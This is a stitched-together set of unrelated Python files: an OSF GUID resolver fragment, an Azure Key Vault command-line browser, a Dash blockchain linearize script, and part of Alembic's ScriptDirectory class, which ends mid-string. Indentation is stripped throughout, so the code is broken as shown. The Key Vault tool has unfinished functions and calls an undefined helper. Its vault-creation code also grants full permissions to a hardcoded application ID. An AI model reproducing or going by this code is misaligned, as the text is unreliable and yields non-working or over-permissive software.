routing table, and return the return value of the view function without
changing the URL.
:param str guid: GUID primary key
:param str suffix: Remainder of URL after the GUID
:return: Return value of proxied view function
"""
try:
# Look up
guid_object = Guid.load(guid)
except KeyError as e:
if e.message == 'osfstorageguidfile': # Used when an old detached OsfStorageGuidFile object is accessed
raise HTTPError(http.NOT_FOUND)
else:
raise e
if guid_object:
# verify that the object implements a GuidStoredObject-like interface. If a model
# was once GuidStoredObject-like but that relationship has changed, it's
# possible to have referents that are instances of classes that don't
# have a deep_url attribute or otherwise don't behave as
# expected.
if not hasattr(guid_object.referent, 'deep_url'):
sentry.log_message(
'Guid `{}` resolved to an object with no deep_url'.format(guid)
)
raise HTTPError(http.NOT_FOUND)
referent = guid_object.referent
if referent is None:
logger.error('Referent of GUID {0} not found'.format(guid))
raise HTTPError(http.NOT_FOUND)
if not referent.deep_url:
raise HTTPError(http.NOT_FOUND)
if isinstance(referent, PreprintService):
return send_from_directory(
os.path.abspath(os.path.join(os.getcwd(), EXTERNAL_EMBER_APPS['preprints']['path'])),
'index.html'
)
url = _build_guid_url(urllib.unquote(referent.deep_url), suffix)
return proxy_url(url)
# GUID not found; try lower-cased and redirect if exists
guid_object_lower = Guid.load(guid.lower())
if guid_object_lower:
return redirect(
_build_guid_url(guid.lower(), suffix)
)
# GUID not found
raise HTTPError(http.NOT_FOUND)
# Redirects #
# redirect osf.io/about/ to OSF wiki page osf.io/4znzp/wiki/home/
def redirect_about(**kwargs):
return redirect('https://osf.io/4znzp/wiki/home/')
def redirect_help(**kwargs):
return redirect('/faq/')
# redirect osf.io/howosfworks to osf.io/getting-started/
def redirect_howosfworks(**kwargs):
return redirect('/getting-started/')
# redirect osf.io/getting-started to help.osf.io/
def redirect_getting_started(**kwargs):
return redirect('http://help.osf.io/')
# Redirect to home page
def redirect_to_home():
return redirect('/')
def redirect_to_cos_news(**kwargs):
# Redirect to COS News page
return redirect('https://cos.io/news/')
| |
#!/usr/local/bin/python
from azure.mgmt.keyvault.models import Sku
from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters, VaultProperties, SkuName, AccessPolicyEntry, \
Permissions, KeyPermissions, SecretPermissions, CertificatePermissions
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication
from azure.keyvault.models import JsonWebKeyType
from azure.mgmt.keyvault import KeyVaultManagementClient
import json
import os
import sys
from key_vault_config import KeyVaultConfig
from key_vault_auth import KeyVaultAuth
CLIENT_ID = '8fd4d3c4-efea-49aa-b1de-2c33c22da56e' # Azure cli
CLIENT_OID = '8694d835-b4e2-419a-a315-b13c854166e2'
CLIENT_TENANT_ID = 'a7fc734e-9961-43ce-b4de-21b8b38403ba'
def _json_format(obj):
return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': '))
class KV_Repl(object):
_repl_break_commands = set(('back', 'b'))
_repl_quit_commands = set(('quit', 'q'))
def __init__(self, config):
self._auth = KeyVaultAuth(config, CLIENT_ID)
self._config = config
self._mgmt_client = KeyVaultManagementClient(self._auth.get_arm_creds(), config.subscription_id)
self._data_client = KeyVaultClient(self._auth.get_keyvault_creds())
self._selected_vault = None
self._current_index = None
def start(self):
try:
self._vault_index_loop();
except SystemExit:
print('\nuser exited\n')
def _continue_repl(self, display_action, break_commands=()):
display_action()
self._selection = input('> ').lower()
if self._selection in break_commands:
return None
elif self._selection in KV_Repl._repl_quit_commands:
sys.exit()
try:
self._selection = int(self._selection)
except ValueError:
pass
return self._selection
def _display_vault_index(self):
print('\nAvailable Vaults:\n')
self._current_index = self._get_vault_list()
for idx, vault in enumerate(self._current_index):
print('%d. %s' % (idx, vault.name))
print('\n#:select | (a)dd | (d)elete | (q)uit')
def _vault_index_loop(self):
while self._continue_repl(self._display_vault_index) is not None:
vaults = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(vaults):
self._selected_vault = self._mgmt_client.vaults.get(self._config.resource_group, vaults[i].name)
self._vault_detail_loop()
else:
print('invalid vault index')
elif self._selection == 'a' or self._selection == 'add':
self._add_vault()
else:
print('invalid input')
def _add_vault(self):
name = input('\nenter vault name:')
all_perms = Permissions()
all_perms.keys = [KeyPermissions.all]
all_perms.secrets = [SecretPermissions.all]
all_perms.certificates = [CertificatePermissions.all]
user_policy = AccessPolicyEntry(self._config.tenant_id, self._config.user_oid, all_perms)
app_policy = AccessPolicyEntry(CLIENT_TENANT_ID, CLIENT_OID, all_perms)
access_policies = [user_policy, app_policy]
properties = VaultProperties(self._config.tenant_id, Sku(name='standard'), access_policies)
properties.enabled_for_deployment = True
properties.enabled_for_disk_encryption = True
properties.enabled_for_template_deployment = True
vault = VaultCreateOrUpdateParameters(self._config.location, properties)
self._mgmt_client.vaults.create_or_update(self._config.resource_group, name, vault)
print('vault %s created\n' % name)
def _display_selected_vault_detail(self):
print('\nName:\t%s' % self._selected_vault.name)
print('Uri:\t%s' % self._selected_vault.properties.vault_uri)
print('Id:\t%s' % self._selected_vault.id)
print('\n(s)ecrets | (k)eys | (c)ertificates | (e)ncrypt | (d)ecrypt | (b)ack | (q)uit\n')
def _vault_detail_loop(self):
while self._continue_repl(self._display_selected_vault_detail, break_commands=KV_Repl._repl_break_commands) is not None:
if self._selection == 's' or self._selection == 'secrets':
self._secret_index_loop()
elif self._selection == 'k' or self._selection == 'keys':
self._key_index_loop()
elif self._selection == 'c' or self._selection == 'certificates':
print('\nnot yet implemented\n')
elif self._selection == 'e' or self._selection == 'encrypt':
self._encrypt_file()
else:
print('invalid input')
def _encrypt_file(self):
while True:
inpath = input('input file: ')
if os.path.isfile(inpath):
break
else:
print('error: file not found')
while True:
outpath = input('output file: ')
@staticmethod
def _prompt_for_file_path(prompt, verify_exists):
inpath = input(prompt)
def _display_secret_index(self):
self._current_index = []
secret_iter = self._data_client.get_secrets(self._selected_vault.properties.vault_uri)
if secret_iter is not None:
try:
self._current_index = [secret for secret in secret_iter]
except TypeError:
pass
print('\n%s Secrets:\n' % self._selected_vault.name)
for idx, s in enumerate(self._current_index):
print('%d. %s' % (idx, KV_Repl._get_name_from_url(s.id)))
print('\n#:show secret value (a)dd (d)elete (b)ack (q)uit\n')
def _secret_index_loop(self):
while self._continue_repl(self._display_secret_index, break_commands=KV_Repl._repl_break_commands) is not None:
secrets = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(secrets):
print('\n%s = %s\n' % (KV_Repl._get_secret_name_from_url(secrets[i].id), self._data_client.get_secret(secrets[i].id).value))
else:
print('invalid secret index')
elif self._selection == 'a' or self._selection == 'add':
self._add_secret()
elif self._selection == 'd' or self._selection == 'delete':
print('\nnot yet implemented\n')
def _add_secret(self):
secret_name = input('\nSecret Name: ')
secret_value = input('Secret Value: ')
self._data_client.set_secret(self._selected_vault.properties.vault_uri, secret_name, secret_value)
print('\nSecret %s added to vault %s' % (secret_name, self._selected_vault.name))
def _display_key_index(self):
self._current_index = []
key_iter = self._data_client.get_keys(self._selected_vault.properties.vault_uri)
if key_iter is not None:
try:
self._current_index = [secret for secret in key_iter]
except TypeError:
print('warning: caught TypeError')
pass
print('\n%s Keys:\n' % self._selected_vault.name)
for idx, k in enumerate(self._current_index):
print('%d. %s' % (idx, KV_Repl._get_name_from_url(k.kid)))
print('\n#:get key | (a)dd | (i)mport | (d)elete | (b)ack | (q)uit\n')
def _key_index_loop(self):
while self._continue_repl(self._display_key_index, break_commands=KV_Repl._repl_break_commands) is not None:
keys = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(keys):
print('\n%s = %s\n' % (KV_Repl._get_secret_name_from_url(keys[i].id), self._data_client.get_secret(keys[i].id).value))
else:
print('invalid key index')
elif self._selection == 'a' or self._selection == 'add':
self._add_key()
elif self._selection == 'd' or self._selection == 'delete':
print('\nnot yet implemented\n')
def _add_key(self):
key_name = input('\nKey Name: ')
self._data_client.create_key(self._selected_vault.properties.vault_uri, key_name, kty=JsonWebKeyType.rsa.value)
print('\nSecret %s added to vault %s' % (key_name, self._selected_vault.name))
@staticmethod
def _get_name_from_url(url):
split = url.split('/')
return split[len(split) - 1]
def _get_vault_list(self):
vault_list = [vault for vault in self._mgmt_client.vaults.list()]
return vault_list
config = KeyVaultConfig()
config.from_disk()
repl = KV_Repl(config)
repl.start()
config.to_disk()
| |
#!/usr/bin/env python3
#
# linearize-data.py: Construct a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function, division
import struct
import re
import os
import os.path
import sys
import hashlib
import dash_hash
import datetime
import time
from collections import namedtuple
from binascii import hexlify, unhexlify
settings = {}
##### Switch endian-ness #####
def hex_switchEndian(s):
""" Switches the endianness of a hex string (in pairs of hex chars) """
pairList = [s[i:i+2].encode() for i in range(0, len(s), 2)]
return b''.join(pairList[::-1]).decode()
def uint32(x):
return x & 0xffffffff
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return b''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return b''.join(out_words)
def calc_hdr_hash(blk_hdr):
#hash1 = hashlib.sha256()
#hash1.update(blk_hdr)
#hash1_o = hash1.digest()
#hash2 = hashlib.sha256()
#hash2.update(hash1_o)
#hash2_o = hash2.digest()
#return hash2_o
pow_hash = dash_hash.getPoWHash(blk_hdr)
return pow_hash
def calc_hash_str(blk_hdr):
hash = calc_hdr_hash(blk_hdr)
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hexlify(hash).decode('utf-8')
return hash_str
def get_blk_dt(blk_hdr):
members = struct.unpack("<I", blk_hdr[68:68+4])
nTime = members[0]
dt = datetime.datetime.fromtimestamp(nTime)
dt_ym = datetime.datetime(dt.year, dt.month, 1)
return (dt_ym, nTime)
# When getting the list of block hashes, undo any byte reversals.
def get_block_hashes(settings):
blkindex = []
f = open(settings['hashlist'], "r")
for line in f:
line = line.rstrip()
if settings['rev_hash_bytes'] == 'true':
line = hex_switchEndian(line)
blkindex.append(line)
print("Read " + str(len(blkindex)) + " hashes")
return blkindex
# The block map shouldn't give or receive byte-reversed hashes.
def mkblockmap(blkindex):
blkmap = {}
for height,hash in enumerate(blkindex):
blkmap[hash] = height
return blkmap
# Block header and extent on disk
BlockExtent = namedtuple('BlockExtent', ['fn', 'offset', 'inhdr', 'blkhdr', 'size'])
class BlockDataCopier:
def __init__(self, settings, blkindex, blkmap):
self.settings = settings
self.blkindex = blkindex
self.blkmap = blkmap
self.inFn = 0
self.inF = None
self.outFn = 0
self.outsz = 0
self.outF = None
self.outFname = None
self.blkCountIn = 0
self.blkCountOut = 0
self.lastDate = datetime.datetime(2000, 1, 1)
self.highTS = 1408893517 - 315360000
self.timestampSplit = False
self.fileOutput = True
self.setFileTime = False
self.maxOutSz = settings['max_out_sz']
if 'output' in settings:
self.fileOutput = False
if settings['file_timestamp'] != 0:
self.setFileTime = True
if settings['split_timestamp'] != 0:
self.timestampSplit = True
# Extents and cache for out-of-order blocks
self.blockExtents = {}
self.outOfOrderData = {}
self.outOfOrderSize = 0 # running total size for items in outOfOrderData
def writeBlock(self, inhdr, blk_hdr, rawblock):
blockSizeOnDisk = len(inhdr) + len(blk_hdr) + len(rawblock)
if not self.fileOutput and ((self.outsz + blockSizeOnDisk) > self.maxOutSz):
self.outF.close()
if self.setFileTime:
os.utime(self.outFname, (int(time.time()), self.highTS))
self.outF = None
self.outFname = None
self.outFn = self.outFn + 1
self.outsz = 0
(blkDate, blkTS) = get_blk_dt(blk_hdr)
if self.timestampSplit and (blkDate > self.lastDate):
print("New month " + blkDate.strftime("%Y-%m") + " @ " + self.hash_str)
self.lastDate = blkDate
if self.outF:
self.outF.close()
if self.setFileTime:
os.utime(self.outFname, (int(time.time()), self.highTS))
self.outF = None
self.outFname = None
self.outFn = self.outFn + 1
self.outsz = 0
if not self.outF:
if self.fileOutput:
self.outFname = self.settings['output_file']
else:
self.outFname = os.path.join(self.settings['output'], "blk%05d.dat" % self.outFn)
print("Output file " + self.outFname)
self.outF = open(self.outFname, "wb")
self.outF.write(inhdr)
self.outF.write(blk_hdr)
self.outF.write(rawblock)
self.outsz = self.outsz + len(inhdr) + len(blk_hdr) + len(rawblock)
self.blkCountOut = self.blkCountOut + 1
if blkTS > self.highTS:
self.highTS = blkTS
if (self.blkCountOut % 1000) == 0:
print('%i blocks scanned, %i blocks written (of %i, %.1f%% complete)' %
(self.blkCountIn, self.blkCountOut, len(self.blkindex), 100.0 * self.blkCountOut / len(self.blkindex)))
def inFileName(self, fn):
return os.path.join(self.settings['input'], "blk%05d.dat" % fn)
def fetchBlock(self, extent):
'''Fetch block contents from disk given extents'''
with open(self.inFileName(extent.fn), "rb") as f:
f.seek(extent.offset)
return f.read(extent.size)
def copyOneBlock(self):
'''Find the next block to be written in the input, and copy it to the output.'''
extent = self.blockExtents.pop(self.blkCountOut)
if self.blkCountOut in self.outOfOrderData:
# If the data is cached, use it from memory and remove from the cache
rawblock = self.outOfOrderData.pop(self.blkCountOut)
self.outOfOrderSize -= len(rawblock)
else: # Otherwise look up data on disk
rawblock = self.fetchBlock(extent)
self.writeBlock(extent.inhdr, extent.blkhdr, rawblock)
def run(self):
while self.blkCountOut < len(self.blkindex):
if not self.inF:
fname = self.inFileName(self.inFn)
print("Input file " + fname)
try:
self.inF = open(fname, "rb")
except IOError:
print("Premature end of block data")
return
inhdr = self.inF.read(8)
if (not inhdr or (inhdr[0] == "\0")):
self.inF.close()
self.inF = None
self.inFn = self.inFn + 1
continue
inMagic = inhdr[:4]
if (inMagic != self.settings['netmagic']):
print("Invalid magic: " + hexlify(inMagic).decode('utf-8'))
return
inLenLE = inhdr[4:]
su = struct.unpack("<I", inLenLE)
inLen = su[0] - 80 # length without header
blk_hdr = self.inF.read(80)
inExtent = BlockExtent(self.inFn, self.inF.tell(), inhdr, blk_hdr, inLen)
self.hash_str = calc_hash_str(blk_hdr)
if not self.hash_str in blkmap:
# Because blocks can be written to files out-of-order as of 0.10, the script
# may encounter blocks it doesn't know about. Treat as debug output.
if settings['debug_output'] == 'true':
print("Skipping unknown block " + self.hash_str)
self.inF.seek(inLen, os.SEEK_CUR)
continue
blkHeight = self.blkmap[self.hash_str]
self.blkCountIn += 1
if self.blkCountOut == blkHeight:
# If in-order block, just copy
rawblock = self.inF.read(inLen)
self.writeBlock(inhdr, blk_hdr, rawblock)
# See if we can catch up to prior out-of-order blocks
while self.blkCountOut in self.blockExtents:
self.copyOneBlock()
else: # If out-of-order, skip over block data for now
self.blockExtents[blkHeight] = inExtent
if self.outOfOrderSize < self.settings['out_of_order_cache_sz']:
# If there is space in the cache, read the data
# Reading the data in file sequence instead of seeking and fetching it later is preferred,
# but we don't want to fill up memory
self.outOfOrderData[blkHeight] = self.inF.read(inLen)
self.outOfOrderSize += inLen
else: # If no space in cache, seek forward
self.inF.seek(inLen, os.SEEK_CUR)
print("Done (%i blocks written)" % (self.blkCountOut))
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-data.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
# Force hash byte format setting to be lowercase to make comparisons easier.
# Also place upfront in case any settings need to know about it.
if 'rev_hash_bytes' not in settings:
settings['rev_hash_bytes'] = 'false'
settings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()
if 'netmagic' not in settings:
settings['netmagic'] = 'bf0c6bbd'
if 'genesis' not in settings:
settings['genesis'] = '00000ffd590b1485b3caadc19b22e6379c733355108f107a430458cdf3407ab6'
if 'input' not in settings:
settings['input'] = 'input'
if 'hashlist' not in settings:
settings['hashlist'] = 'hashlist.txt'
if 'file_timestamp' not in settings:
settings['file_timestamp'] = 0
if 'split_timestamp' not in settings:
settings['split_timestamp'] = 0
if 'max_out_sz' not in settings:
settings['max_out_sz'] = 1000 * 1000 * 1000
if 'out_of_order_cache_sz' not in settings:
settings['out_of_order_cache_sz'] = 100 * 1000 * 1000
if 'debug_output' not in settings:
settings['debug_output'] = 'false'
settings['max_out_sz'] = int(settings['max_out_sz'])
settings['split_timestamp'] = int(settings['split_timestamp'])
settings['file_timestamp'] = int(settings['file_timestamp'])
settings['netmagic'] = unhexlify(settings['netmagic'].encode('utf-8'))
settings['out_of_order_cache_sz'] = int(settings['out_of_order_cache_sz'])
settings['debug_output'] = settings['debug_output'].lower()
if 'output_file' not in settings and 'output' not in settings:
print("Missing output file / directory")
sys.exit(1)
blkindex = get_block_hashes(settings)
blkmap = mkblockmap(blkindex)
# Block hash map won't be byte-reversed. Neither should the genesis hash.
if not settings['genesis'] in blkmap:
print("Genesis block not found in hashlist")
else:
BlockDataCopier(settings, blkindex, blkmap).run()
| |
import datetime
from dateutil import tz
import os
import re
import shutil
from .. import util
from ..util import compat
from . import revision
from ..runtime import migration
from contextlib import contextmanager
_sourceless_rev_file = re.compile(r'(?!\.\#|__init__)(.*\.py)(c|o)?$')
_only_source_rev_file = re.compile(r'(?!\.\#|__init__)(.*\.py)$')
_legacy_rev = re.compile(r'([a-f0-9]+)\.py$')
_mod_def_re = re.compile(r'(upgrade|downgrade)_([a-z0-9]+)')
_slug_re = re.compile(r'\w+')
_default_file_template = "%(rev)s_%(slug)s"
_split_on_space_comma = re.compile(r',|(?: +)')
class ScriptDirectory(object):
"""Provides operations upon an Alembic script directory.
This object is useful to get information as to current revisions,
most notably being able to get at the "head" revision, for schemes
that want to test if the current revision in the database is the most
recent::
from alembic.script import ScriptDirectory
from alembic.config import Config
config = Config()
config.set_main_option("script_location", "myapp:migrations")
script = ScriptDirectory.from_config(config)
head_revision = script.get_current_head()
"""
def __init__(self, dir, file_template=_default_file_template,
truncate_slug_length=40,
version_locations=None,
sourceless=False, output_encoding="utf-8",
timezone=None):
self.dir = dir
self.file_template = file_template
self.version_locations = version_locations
self.truncate_slug_length = truncate_slug_length or 40
self.sourceless = sourceless
self.output_encoding = output_encoding
self.revision_map = revision.RevisionMap(self._load_revisions)
self.timezone = timezone
if not os.access(dir, os.F_OK):
raise util.CommandError("Path doesn't exist: %r. Please use "
"the 'init' command to create a new "
"scripts folder." % dir)
@property
def versions(self):
loc = self._version_locations
if len(loc) > 1:
raise util.CommandError("Multiple version_locations present")
else:
return loc[0]
@util.memoized_property
def _version_locations(self):
if self.version_locations:
return [
os.path.abspath(util.coerce_resource_to_filename(location))
for location in self.version_locations
]
else:
return (os.path.abspath(os.path.join(self.dir, 'versions')),)
def _load_revisions(self):
if self.version_locations:
paths = [
vers for vers in self._version_locations
if os.path.exists(vers)]
else:
paths = [self.versions]
dupes = set()
for vers in paths:
for file_ in Script._list_py_dir(self, vers):
path = os.path.realpath(os.path.join(vers, file_))
if path in dupes:
util.warn(
"File %s loaded twice! ignoring. Please ensure "
"version_locations is unique." % path
)
continue
dupes.add(path)
script = Script._from_filename(self, vers, file_)
if script is None:
continue
yield script
@classmethod
def from_config(cls, config):
"""Produce a new :class:`.ScriptDirectory` given a :class:`.Config`
instance.
The :class:`.Config` need only have the ``script_location`` key
present.
"""
script_location = config.get_main_option('script_location')
if script_location is None:
raise util.CommandError("No 'script_location' key "
"found in configuration.")
truncate_slug_length = config.get_main_option("truncate_slug_length")
if truncate_slug_length is not None:
truncate_slug_length = int(truncate_slug_length)
version_locations = config.get_main_option("version_locations")
if version_locations:
version_locations = _split_on_space_comma.split(version_locations)
return ScriptDirectory(
util.coerce_resource_to_filename(script_location),
file_template=config.get_main_option(
'file_template',
_default_file_template),
truncate_slug_length=truncate_slug_length,
sourceless=config.get_main_option("sourceless") == "true",
output_encoding=config.get_main_option("output_encoding", "utf-8"),
version_locations=version_locations,
timezone=config.get_main_option("timezone")
)
@contextmanager
def _catch_revision_errors(
self,
ancestor=None, multiple_heads=None, start=None, end=None,
resolution=None):
try:
yield
except revision.RangeNotAncestorError as rna:
if start is None:
start = rna.lower
if end is None:
end = rna.upper
if not ancestor:
ancestor = (
"Requested range %(start)s:%(end)s does not refer to "
"ancestor/descendant revisions along the same branch"
)
ancestor = ancestor % {"start": start, "end": end}
compat.raise_from_cause(util.CommandError(ancestor))
except revision.MultipleHeads as mh:
if not multiple_heads:
multiple_heads = (
"Multiple head revisions are present for given "
"argument '%(head_arg)s'; please "
"specify a specific target revision, "
"'<branchname>@%(head_arg)s' to "
"narrow to a specific head, or 'heads' for all heads")
multiple_heads = multiple_heads % {
"head_arg": end or mh.argument,
"heads": util.format_as_comma(mh.heads)
}
compat.raise_from_cause(util.CommandError(multiple_heads))
except revision.ResolutionError as re:
if resolution is None:
resolution = "Can't locate revision identified by '%s'" % (
re.argument
)
compat.raise_from_cause(util.CommandError(resolution))
except revision.RevisionError as err:
compat.raise_from_cause(util.CommandError(err.args[0]))
def walk_revisions(self, base="base", head="heads"):
"""Iterate through all revisions.
:param base: the base revision, or "base" to start from the
empty revision.
:param head: the head revision; defaults to "heads" to indicate
all head revisions. May also be "head" to indicate a single
head revision.
.. versionchanged:: 0.7.0 the "head" identifier now refers to
the head of a non-branched repository only; use "heads" to
refer to the set of all head branches simultaneously.
"""
with self._catch_revision_errors(start=base, end=head):
for rev in self.revision_map.iterate_revisions(
head, base, inclusive=True, assert_relative_length=False):
yield rev
def get_revisions(self, id_):
"""Return the :class:`.Script` instance with the given rev identifier,
symbolic name, or sequence of identifiers.
.. versionadded:: 0.7.0
"""
with self._catch_revision_errors():
return self.revision_map.get_revisions(id_)
def get_all_current(self, id_):
with self._catch_revision_errors():
top_revs = set(self.revision_map.get_revisions(id_))
top_revs.update(
self.revision_map._get_ancestor_nodes(
list(top_revs), include_dependencies=True)
)
top_revs = self.revision_map._filter_into_branch_heads(top_revs)
return top_revs
def get_revision(self, id_):
"""Return the :class:`.Script` instance with the given rev id.
.. seealso::
:meth:`.ScriptDirectory.get_revisions`
"""
with self._catch_revision_errors():
return self.revision_map.get_revision(id_)
def as_revision_number(self, id_):
"""Convert a symbolic revision, i.e. 'head' or 'base', into
an actual revision number."""
with self._catch_revision_errors():
rev, branch_name = self.revision_map._resolve_revision_number(id_)
if not rev:
# convert () to None
return None
else:
return rev[0]
def iterate_revisions(self, upper, lower):
"""Iterate through script revisions, starting at the given
upper revision identifier and ending at the lower.
The traversal uses strictly the `down_revision`
marker inside each migration script, so
it is a requirement that upper >= lower,
else you'll get nothing back.
The iterator yields :class:`.Script` objects.
.. seealso::
:meth:`.RevisionMap.iterate_revisions`
"""
return self.revision_map.iterate_revisions(upper, lower)
def get_current_head(self):
"""Return the current head revision.
If the script directory has multiple heads
due to branching, an error is raised;
:meth:`.ScriptDirectory.get_heads` should be
preferred.
:return: a string revision number.
.. seealso::
:meth:`.ScriptDirectory.get_heads`
"""
with self._catch_revision_errors(multiple_heads=(
'The script directory has multiple heads (due to branching).'
'Please use get_heads(), or merge the branches using '
'alembic merge.'
)):
return self.revision_map.get_current_head()
def get_heads(self):
"""Return all "versioned head" revisions as strings.
This is normally a list of length one,
unless branches are present. The
:meth:`.ScriptDirectory.get_current_head()` method
can be used normally when a script directory
has only one head.
:return: a tuple of string revision numbers.
"""
return list(self.revision_map.heads)
def get_base(self):
"""Return the "base" revision as a string.
This is the revision number of the script that
has a ``down_revision`` of None.
If the script directory has multiple bases, an error is raised;
:meth:`.ScriptDirectory.get_bases` should be
preferred.
"""
bases = self.get_bases()
if len(bases) > 1:
raise util.CommandError(
"The script directory has multiple bases. "
"Please use get_bases().")
elif bases:
return bases[0]
else:
return None
def get_bases(self):
"""return all "base" revisions as strings.
This is the revision number of all scripts that
have a ``down_revision`` of None.
.. versionadded:: 0.7.0
"""
return list(self.revision_map.bases)
def _upgrade_revs(self, destination, current_rev):
with self._catch_revision_errors(
ancestor="Destination %(end)s is not a valid upgrade "
"target from current head(s)", end=destination):
revs = self.revision_map.iterate_revisions(
destination, current_rev, implicit_base=True)
revs = list(revs)
return [
migration.MigrationStep.upgrade_from_script(
self.revision_map, script)
for script in reversed(list(revs))
]
def _downgrade_revs(self, destination, current_rev):
with self._catch_revision_errors(
ancestor="Destination %(end)s is not a valid downgrade "
"target from current head(s)", end=destination):
revs = self.revision_map.iterate_revisions(
current_rev, destination, select_for_downgrade=True)
return [
migration.MigrationStep.downgrade_from_script(
self.revision_map, script)
for script in revs
]
def _stamp_revs(self, revision, heads):
with self._catch_revision_errors(
multiple_heads="Multiple heads are present; please specify a "
"single target revision"):
heads = self.get_revisions(heads)
# filter for lineage will resolve things like
# branchname@base, version@base, etc.
filtered_heads = self.revision_map.filter_for_lineage(
heads, revision, include_dependencies=True)
steps = []
dests = self.get_revisions(revision) or [None]
for dest in dests:
if dest is None:
# dest is 'base'. Return a "delete branch" migration
# for all applicable heads.
steps.extend([
migration.StampStep(head.revision, None, False, True,
self.revision_map)
for head in filtered_heads
])
continue
elif dest in filtered_heads:
# the dest is already in the version table, do nothing.
continue
# figure out if the dest is a descendant or an
# ancestor of the selected nodes
descendants = set(
self.revision_map._get_descendant_nodes([dest]))
ancestors = set(self.revision_map._get_ancestor_nodes([dest]))
if descendants.intersection(filtered_heads):
# heads are above the target, so this is a downgrade.
# we can treat them as a "merge", single step.
assert not ancestors.intersection(filtered_heads)
todo_heads = [head.revision for head in filtered_heads]
step = migration.StampStep(
todo_heads, dest.revision, False, False,
self.revision_map)
steps.append(step)
continue
elif ancestors.intersection(filtered_heads):
# heads are below the target, so this is an upgrade.
# we can treat them as a "merge", single step.
todo_heads = [head.revision for head in filtered_heads]
step = migration.StampStep(
todo_heads, dest.revision, True, False,
self.revision_map)
steps.append(step)
continue
else:
# destination is in a branch not represented,
# treat it as new branch
step = migration.StampStep((), dest.revision, True, True,
self.revision_map)
steps.append(step)
continue
return steps
def run_env(self):
"""Run the script environment.
This basically runs the ``env.py`` script present
in the migration environment. It is called exclusively
by the command functions in :mod:`alembic.command`.
"""
util.load_python_file(self.dir, 'env.py')
@property
def env_py_location(self):
return os.path.abspath(os.path.join(self.dir, "env.py"))
def _generate_template(self, src, dest, **kw):
util.status("Generating %s" % os.path.abspath(dest),
util.template_to_file,
src,
dest,
self.output_encoding,
**kw
)
def _copy_file(self, src, dest):
util.status("Generating %s" % os.path.abspath(dest),
shutil.copy,
src, dest)
def _ensure_directory(self, path):
path = os.path.abspath(path)
if not os.path.exists(path):
util.status(
"Creating directory %s" % path,
os.makedirs, path)
def _generate_create_date(self):
if self.timezone is not None:
# First, assume correct capitalization
tzinfo = tz.gettz(self.timezone)
if tzinfo is None:
# Fall back to uppercase
tzinfo = tz.gettz(self.timezone.upper())
if tzinfo is None:
raise util.CommandError(
"Can't locate timezone: %s" % self.timezone)
create_date = datetime.datetime.utcnow().replace(
tzinfo=tz.tzutc()).astimezone(tzinfo)
else:
create_date = datetime.datetime.now()
return create_date
def generate_revision(
self, revid, message, head=None,
refresh=False, splice=False, branch_labels=None,
version_path=None, depends_on=None, **kw):
"""Generate a new revision file.
This runs the ``script.py.mako`` template, given
template arguments, and creates a new file.
:param revid: String revision id. Typically this
comes from ``alembic.util.rev_id()``.
:param message: the revision message, the one passed
by the -m argument to the ``revision`` command.
:param head: the head revision to generate against. Defaults
to the current "head" if no branches are present, else raises
an exception.
.. versionadded:: 0.7.0
:param splice: if True, allow the "head" version to not be an
actual head; otherwise, the selected head must be a head
(e.g. endpoint) revision.
:param refresh: deprecated.
"""
if head is None:
head = "head"
try:
Script.verify_rev_id(revid)
except revision.RevisionError as err:
compat.raise_from_cause(util.CommandError(err.args[0]))
with self._catch_revision_errors(multiple_heads=(
"Multiple heads are present; please specify the head "
"revision on which the new revision should be based, "
"or perform a merge."
)):
heads = self.revision_map.get_revisions(head)
if len(set(heads)) != len(heads):
raise util.CommandError("Duplicate head revisions specified")
create_date = self._generate_create_date()
if version_path is None:
if len(self._version_locations) > 1:
for head in heads:
if head is not None:
version_path = os.path.dirname(head.path)
break
else:
raise util.CommandError(
"Multiple version locations present, "
"please specify --version-path")
else:
version_path = self.versions
norm_path = os.path.normpath(os.path.abspath(version_path))
for vers_path in self._version_locations:
if os.path.normpath(vers_path) == norm_path:
break
else:
raise util.CommandError(
"Path %s is not represented in current "
"version locations" % version_path)
if self.version_locations:
self._ensure_directory(version_path)
path = self._rev_path(version_path, revid, message, create_date)
if not splice:
for head in heads:
if head is not None and not head.is_head:
raise util.CommandError(
"Revision %s is not a head revision; please specify "
"--splice to create a new branch from this revision"
% head.revision)
if depends_on:
with self._catch_revision_errors():
depends_on = [
dep
if dep in rev.branch_labels # maintain branch labels
else rev.revision # resolve partial revision identifiers
for rev, dep in [
(self.revision_map.get_revision(dep), dep)
for dep in util.to_list(depends_on)
]
]
self._generate_template(
os.path.join(self.dir, "script.py.mako"),
path,
up_revision=str(revid),
down_revision=revision.tuple_rev_as_scalar(
tuple(h.revision if h is not None else None for h in heads)),
branch_labels=util.to_tuple(branch_labels),
depends_on=revision.tuple_rev_as_scalar(depends_on),
create_date=create_date,
comma=util.format_as_comma,
message=message if message is not None else ("empty message"),
**kw
)
try:
script = Script._from_path(self, path)
except revision.RevisionError as err:
compat.raise_from_cause(util.CommandError(err.args[0]))
if branch_labels and not script.branch_labels:
raise util.CommandError(
"Version %s specified branch_labels %s, however the "
"migration file %s does not have them; have you upgraded "
"your script.py.mako to include the "
